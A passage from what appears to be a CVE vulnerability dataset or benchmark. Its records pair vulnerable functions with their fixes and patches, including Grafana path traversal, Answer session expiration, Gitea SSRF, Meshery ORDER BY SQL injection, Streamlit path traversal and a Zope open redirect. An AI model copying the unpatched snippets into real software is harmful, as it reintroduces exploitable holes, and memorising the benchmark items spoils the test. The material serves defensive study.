!plugin.IncludedInSignature(rel) {\n\t\ths.log.Warn(\"Access to requested plugin file will be forbidden in upcoming Grafana versions as the file \"+\n\t\t\t\"is not included in the plugin signature\", \"file\", requestedFile)\n\t}\n\n\tabsPluginDir, err := filepath.Abs(plugin.PluginDir)\n\tif err != nil {\n\t\tc.JsonApiErr(500, \"Failed to get plugin absolute path\", nil)\n\t\treturn\n\t}\n\n\tpluginFilePath := filepath.Join(absPluginDir, rel)\n\t// It's safe to ignore gosec warning G304 since we already clean the requested file path and subsequently\n\t// use this with a prefix of the plugin's directory, which is set during plugin loading\n\t// nolint:gosec\n\tf, err := os.Open(pluginFilePath)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\tc.JsonApiErr(404, \"Plugin file not found\", err)\n\t\t\treturn\n\t\t}\n\t\tc.JsonApiErr(500, \"Could not open plugin file\", err)\n\t\treturn\n\t}\n\tdefer func() {\n\t\tif err := f.Close(); err != nil {\n\t\t\ths.log.Error(\"Failed to close file\", \"err\", err)\n\t\t}\n\t}()\n\n\tfi, err := f.Stat()\n\tif err != nil {\n\t\tc.JsonApiErr(500, \"Plugin file exists but could not open\", err)\n\t\treturn\n\t}\n\n\tif hs.Cfg.Env == setting.Dev {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"max-age=0, must-revalidate, no-cache\")\n\t} else {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"public, max-age=3600\")\n\t}\n\n\thttp.ServeContent(c.Resp, c.Req, pluginFilePath, fi.ModTime(), f)\n}"}], "vul_patch": "--- a/pkg/api/plugins.go\n+++ b/pkg/api/plugins.go\n@@ -6,14 +6,27 @@\n \t\treturn\n \t}\n \n-\trequestedFile := filepath.Clean(web.Params(c.Req)[\"*\"])\n-\tpluginFilePath := filepath.Join(plugin.PluginDir, requestedFile)\n+\t// prepend slash for cleaning relative paths\n+\trequestedFile := filepath.Clean(filepath.Join(\"/\", web.Params(c.Req)[\"*\"]))\n+\trel, err := filepath.Rel(\"/\", requestedFile)\n+\tif err != nil {\n+\t\t// slash is prepended above therefore this is not expected to fail\n+\t\tc.JsonApiErr(500, \"Failed to get the relative path\", err)\n+\t\treturn\n+\t}\n \n-\tif !plugin.IncludedInSignature(requestedFile) {\n+\tif !plugin.IncludedInSignature(rel) {\n \t\ths.log.Warn(\"Access to requested plugin file will be forbidden in upcoming Grafana versions as the file \"+\n \t\t\t\"is not included in the plugin signature\", \"file\", requestedFile)\n \t}\n \n+\tabsPluginDir, err := filepath.Abs(plugin.PluginDir)\n+\tif err != nil {\n+\t\tc.JsonApiErr(500, \"Failed to get plugin absolute path\", nil)\n+\t\treturn\n+\t}\n+\n+\tpluginFilePath := filepath.Join(absPluginDir, rel)\n \t// It's safe to ignore gosec warning G304 since we already clean the requested file path and subsequently\n \t// use this with a prefix of the plugin's directory, which is set during plugin loading\n \t// nolint:gosec\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-43798:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/grafana\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_GetPluginAssets$ github.com/grafana/grafana/pkg/api\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-43798:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/grafana\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_GetPluginAssets)$' github.com/grafana/grafana/pkg/api\n"} {"cve_id": "CVE-2023-1543", "cve_description": "Insufficient Session Expiration in GitHub repository answerdev/answer prior to 1.0.6.", 
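Illustrative aside (not part of the record): the fix below adds a second purge (RemoveAdminUserCacheInfo) at logout. A tiny hypothetical Python model of the gap, where a token cleared from one cache but not the other keeps the session alive:

user_cache = {}
admin_cache = {}

def login(token, user_id):
    user_cache[token] = user_id
    admin_cache[token] = user_id  # a second store keyed by the same token

def logout_vulnerable(token):
    user_cache.pop(token, None)   # the admin_cache entry survives

def logout_fixed(token):
    user_cache.pop(token, None)
    admin_cache.pop(token, None)  # mirrors the added RemoveAdminUserCacheInfo call

login("tok", "alice")
logout_vulnerable("tok")
assert "tok" in admin_cache       # insufficient expiration: token still honored
logout_fixed("tok")
assert "tok" not in admin_cache   # fixed: every cache tied to the token is purged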
"cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/answerdev/answer", "patch_url": ["https://github.com/answerdev/answer/commit/cd742b75605c99776f32d271c0a60e0f468e181c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_251_1", "commit": "1de3ec27e50ba7389c9449c59e8ea3a37a908ee4", "file_path": "internal/controller/user_controller.go", "start_line": 199, "end_line": 207, "snippet": "func (uc *UserController) UserLogout(ctx *gin.Context) {\n\taccessToken := middleware.ExtractToken(ctx)\n\tif len(accessToken) == 0 {\n\t\thandler.HandleResponse(ctx, nil, nil)\n\t\treturn\n\t}\n\t_ = uc.authService.RemoveUserCacheInfo(ctx, accessToken)\n\thandler.HandleResponse(ctx, nil, nil)\n}"}], "fix_func": [{"id": "fix_go_251_1", "commit": "cd742b75605c99776f32d271c0a60e0f468e181c", "file_path": "internal/controller/user_controller.go", "start_line": 199, "end_line": 208, "snippet": "func (uc *UserController) UserLogout(ctx *gin.Context) {\n\taccessToken := middleware.ExtractToken(ctx)\n\tif len(accessToken) == 0 {\n\t\thandler.HandleResponse(ctx, nil, nil)\n\t\treturn\n\t}\n\t_ = uc.authService.RemoveUserCacheInfo(ctx, accessToken)\n\t_ = uc.authService.RemoveAdminUserCacheInfo(ctx, accessToken)\n\thandler.HandleResponse(ctx, nil, nil)\n}"}], "vul_patch": "--- a/internal/controller/user_controller.go\n+++ b/internal/controller/user_controller.go\n@@ -5,5 +5,6 @@\n \t\treturn\n \t}\n \t_ = uc.authService.RemoveUserCacheInfo(ctx, accessToken)\n+\t_ = uc.authService.RemoveAdminUserCacheInfo(ctx, accessToken)\n \thandler.HandleResponse(ctx, nil, nil)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-45325", "cve_description": "Server Side Request Forgery (SSRF) vulneraility exists in Gitea before 1.7.0 using the OpenID URL.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/go-gitea/gitea", "patch_url": ["https://github.com/go-gitea/gitea/commit/e9c4609410e9c0a77b257f6bd0e6e0a1c038cbde"], "programing_language": "Go", "vul_func": [{"id": "vul_go_242_1", "commit": "176a6048b4ce43b3f9384083c2ab299aac1fa83a", "file_path": "routers/user/auth_openid.go", "start_line": 90, "end_line": 120, "snippet": "func SignInOpenIDPost(ctx *context.Context, form auth.SignInOpenIDForm) {\n\tctx.Data[\"Title\"] = ctx.Tr(\"sign_in\")\n\tctx.Data[\"PageIsSignIn\"] = true\n\tctx.Data[\"PageIsLoginOpenID\"] = true\n\n\tif ctx.HasError() {\n\t\tctx.HTML(200, tplSignInOpenID)\n\t\treturn\n\t}\n\n\tid, err := openid.Normalize(form.Openid)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\tform.Openid = id\n\n\tlog.Trace(\"OpenID uri: \" + id)\n\n\terr = allowedOpenIDURI(id)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\n\tredirectTo := setting.AppURL + \"user/login/openid\"\n\turl, err := openid.RedirectURL(id, redirectTo, setting.AppURL)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}"}], "fix_func": [{"id": "fix_go_242_1", "commit": 
"e9c4609410e9c0a77b257f6bd0e6e0a1c038cbde", "file_path": "routers/user/auth_openid.go", "start_line": 90, "end_line": 121, "snippet": "func SignInOpenIDPost(ctx *context.Context, form auth.SignInOpenIDForm) {\n\tctx.Data[\"Title\"] = ctx.Tr(\"sign_in\")\n\tctx.Data[\"PageIsSignIn\"] = true\n\tctx.Data[\"PageIsLoginOpenID\"] = true\n\n\tif ctx.HasError() {\n\t\tctx.HTML(200, tplSignInOpenID)\n\t\treturn\n\t}\n\n\tid, err := openid.Normalize(form.Openid)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\tform.Openid = id\n\n\tlog.Trace(\"OpenID uri: \" + id)\n\n\terr = allowedOpenIDURI(id)\n\tif err != nil {\n\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n\t\treturn\n\t}\n\n\tredirectTo := setting.AppURL + \"user/login/openid\"\n\turl, err := openid.RedirectURL(id, redirectTo, setting.AppURL)\n\tif err != nil {\n\t\tlog.Error(1, \"Error in OpenID redirect URL: %s, %v\", redirectTo, err.Error())\n\t\tctx.RenderWithErr(fmt.Sprintf(\"Unable to find OpenID provider in %s\", redirectTo), tplSignInOpenID, &form)\n\t\treturn\n\t}"}], "vul_patch": "--- a/routers/user/auth_openid.go\n+++ b/routers/user/auth_openid.go\n@@ -26,6 +26,7 @@\n \tredirectTo := setting.AppURL + \"user/login/openid\"\n \turl, err := openid.RedirectURL(id, redirectTo, setting.AppURL)\n \tif err != nil {\n-\t\tctx.RenderWithErr(err.Error(), tplSignInOpenID, &form)\n+\t\tlog.Error(1, \"Error in OpenID redirect URL: %s, %v\", redirectTo, err.Error())\n+\t\tctx.RenderWithErr(fmt.Sprintf(\"Unable to find OpenID provider in %s\", redirectTo), tplSignInOpenID, &form)\n \t\treturn\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-35182", "cve_description": "Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.22 may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command. Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system. The Meshery project exposes the function `GetAllEvents` at the API URL `/api/v2/events`. The sort query parameter read in `events_streamer.go` is directly used to build a SQL query in `events_persister.go`. Version 0.7.22 fixes this issue by using the `SanitizeOrderInput` function.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/meshery/meshery", "patch_url": ["https://github.com/meshery/meshery/commit/b55f6064d0c6a965aee38f30281f99da7dc4420c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_228_1", "commit": "c54bc36", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 551, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\t_ = clearCmd.Run()\n}"}, {"id": "vul_go_228_2", "commit": "c54bc36", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 262, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}\nfunc (h *Handler) DeleteMeshSyncResource(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\tresourceID := mux.Vars(r)[\"id\"]\n\tdb := provider.GetGenericPersister()\n\terr := db.Model(&model.KubernetesResource{}).Delete(&model.KubernetesResource{ID: resourceID}).Error\n\tif err != nil {\n\t\th.log.Error(models.ErrDelete(err, \"meshsync data\", http.StatusInternalServerError))\n\t}\n}"}, {"id": "vul_go_228_3", "commit": "c54bc36", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 105, "snippet": "func (e 
*EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(eventsFilter.SortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "fix_func": [{"id": "fix_go_228_1", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 554, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\terr := clearCmd.Run()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}"}, {"id": "fix_go_228_2", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 263, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\torder = 
models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}\nfunc (h *Handler) DeleteMeshSyncResource(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\tresourceID := mux.Vars(r)[\"id\"]\n\tdb := provider.GetGenericPersister()\n\terr := db.Model(&model.KubernetesResource{}).Delete(&model.KubernetesResource{ID: resourceID}).Error\n\tif err != nil {\n\t\th.log.Error(models.ErrDelete(err, \"meshsync data\", http.StatusInternalServerError))\n\t}\n}"}, {"id": "fix_go_228_3", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 106, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(sortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "vul_patch": "--- a/mesheryctl/pkg/utils/helpers.go\n+++ b/mesheryctl/pkg/utils/helpers.go\n@@ -4,5 +4,8 @@\n \t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n \t}\n \tclearCmd.Stdout = os.Stdout\n-\t_ = clearCmd.Run()\n+\terr := clearCmd.Run()\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n }\n\n--- 
a/server/handlers/meshsync_handler.go\n+++ b/server/handlers/meshsync_handler.go\n@@ -39,6 +39,7 @@\n \t\tresult = result.Offset(offset)\n \t}\n \n+\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif order != \"\" {\n \t\tif sort == \"desc\" {\n \t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\n--- a/server/models/events_persister.go\n+++ b/server/models/events_persister.go\n@@ -22,10 +22,11 @@\n \t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n \t}\n \n+\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif eventsFilter.Order == \"asc\" {\n-\t\tfinder = finder.Order(eventsFilter.SortOn)\n+\t\tfinder = finder.Order(sortOn)\n \t} else {\n-\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n+\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n \t}\n \n \tvar count int64\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-42474", "cve_description": "Streamlit is a data oriented application development framework for python. Snowflake Streamlit open source addressed a security vulnerability via the static file sharing feature. Users of hosted Streamlit app(s) on Windows were vulnerable to a path traversal vulnerability when the static file sharing feature is enabled. An attacker could utilize the vulnerability to leak the password hash of the Windows user running Streamlit. The vulnerability was patched on Jul 25, 2024, as part of Streamlit open source version 1.37.0. The vulnerability only affects Windows.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/streamlit/streamlit", "patch_url": ["https://github.com/streamlit/streamlit/commit/3a639859cfdfba2187c81897d44a3e33825eb0a3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_141_1", "commit": "40303e1", "file_path": "lib/streamlit/web/server/app_static_file_handler.py", "start_line": 37, "end_line": 67, "snippet": "class AppStaticFileHandler(tornado.web.StaticFileHandler):\n def initialize(self, path: str, default_filename: str | None = None) -> None:\n super().initialize(path, default_filename)\n mimetypes.add_type(\"image/webp\", \".webp\")\n\n def validate_absolute_path(self, root: str, absolute_path: str) -> str | None:\n full_path = os.path.realpath(absolute_path)\n\n if os.path.isdir(full_path):\n # we don't want to serve directories, and serve only files\n raise tornado.web.HTTPError(404)\n\n if os.path.commonpath([full_path, root]) != root:\n # Don't allow misbehaving clients to break out of the static files directory\n _LOGGER.warning(\n \"Serving files outside of the static directory is not supported\"\n )\n raise tornado.web.HTTPError(404)\n\n if (\n os.path.exists(full_path)\n and 
os.path.getsize(full_path) > MAX_APP_STATIC_FILE_SIZE\n ):\n raise tornado.web.HTTPError(\n 404,\n \"File is too large, its size should not exceed \"\n f\"{MAX_APP_STATIC_FILE_SIZE} bytes\",\n reason=\"File is too large\",\n )\n\n return super().validate_absolute_path(root, absolute_path)"}], "fix_func": [{"id": "fix_py_141_1", "commit": "3a63985", "file_path": "lib/streamlit/web/server/app_static_file_handler.py", "start_line": 37, "end_line": 69, "snippet": "class AppStaticFileHandler(tornado.web.StaticFileHandler):\n def initialize(self, path: str, default_filename: str | None = None) -> None:\n super().initialize(path, default_filename)\n mimetypes.add_type(\"image/webp\", \".webp\")\n\n def validate_absolute_path(self, root: str, absolute_path: str) -> str | None:\n full_path = os.path.realpath(absolute_path)\n\n ret_val = super().validate_absolute_path(root, absolute_path)\n\n if os.path.isdir(full_path):\n # we don't want to serve directories, and serve only files\n raise tornado.web.HTTPError(404)\n\n if os.path.commonpath([full_path, root]) != root:\n # Don't allow misbehaving clients to break out of the static files directory\n _LOGGER.warning(\n \"Serving files outside of the static directory is not supported\"\n )\n raise tornado.web.HTTPError(404)\n\n if (\n os.path.exists(full_path)\n and os.path.getsize(full_path) > MAX_APP_STATIC_FILE_SIZE\n ):\n raise tornado.web.HTTPError(\n 404,\n \"File is too large, its size should not exceed \"\n f\"{MAX_APP_STATIC_FILE_SIZE} bytes\",\n reason=\"File is too large\",\n )\n\n return ret_val"}], "vul_patch": "--- a/lib/streamlit/web/server/app_static_file_handler.py\n+++ b/lib/streamlit/web/server/app_static_file_handler.py\n@@ -5,6 +5,8 @@\n \n def validate_absolute_path(self, root: str, absolute_path: str) -> str | None:\n full_path = os.path.realpath(absolute_path)\n+\n+ ret_val = super().validate_absolute_path(root, absolute_path)\n \n if os.path.isdir(full_path):\n # we don't want to serve directories, and serve only files\n@@ -28,4 +30,4 @@\n reason=\"File is too large\",\n )\n \n- return super().validate_absolute_path(root, absolute_path)\n+ return ret_val\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-21337", "cve_description": "Products.PluggableAuthService is a pluggable Zope authentication and authorization framework. In Products.PluggableAuthService before version 2.6.0 there is an open redirect vulnerability. A maliciously crafted link to the login form and login functionality could redirect the browser to a different website. The problem has been fixed in version 2.6.1. 
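The remediation pattern here is worth spelling out: the patched plugin reduces the attacker-controllable came_from value to a site-local URL before redirecting. Below is a minimal Go sketch of the same CWE-601 guard, with illustrative names; the authoritative change is the urlparse/urlunparse call in fix_py_368_1 below.

```go
// Hedged sketch (illustrative names, not taken from the record): the
// open-redirect fix keeps only the local part of a user-controlled
// return URL, so the redirect can never leave the current site.
package main

import (
	"fmt"
	"net/url"
)

// localOnly drops scheme, host and credentials from cameFrom and keeps
// path, query and fragment, the same idea as the Python fix's
// urlunparse(('', '') + parsed[2:]).
func localOnly(cameFrom string) string {
	u, err := url.Parse(cameFrom)
	if err != nil {
		return "/" // refuse to redirect to something we cannot parse
	}
	rel := &url.URL{Path: u.Path, RawQuery: u.RawQuery, Fragment: u.Fragment}
	return rel.String()
}

func main() {
	fmt.Println(localOnly("https://evil.example/phish?next=1")) // -> /phish?next=1
}
```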
Depending on how you have installed Products.PluggableAuthService, you should change the buildout version pin to `2.6.1` and re-run the buildout, or if you used `pip` simply do `pip install \"Products.PluggableAuthService>=2.6.1\"`.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/zopefoundation/Products.PluggableAuthService", "patch_url": ["https://github.com/zopefoundation/Products.PluggableAuthService/commit/7eead067898852ebd3e0f143bc51295928528dfa"], "programing_language": "Python", "vul_func": [{"id": "vul_py_368_1", "commit": "c49ddb0f2770cab57f76475f4571e8e842181b87", "file_path": "src/Products/PluggableAuthService/plugins/CookieAuthHelper.py", "start_line": 194, "end_line": 239, "snippet": " def unauthorized(self):\n req = self.REQUEST\n resp = req['RESPONSE']\n\n # If we set the auth cookie before, delete it now.\n if self.cookie_name in resp.cookies:\n del resp.cookies[self.cookie_name]\n\n # Redirect if desired.\n url = self.getLoginURL()\n if url is not None:\n came_from = req.get('came_from', None)\n\n if came_from is None:\n came_from = req.get('ACTUAL_URL', '')\n query = req.get('QUERY_STRING')\n if query:\n if not 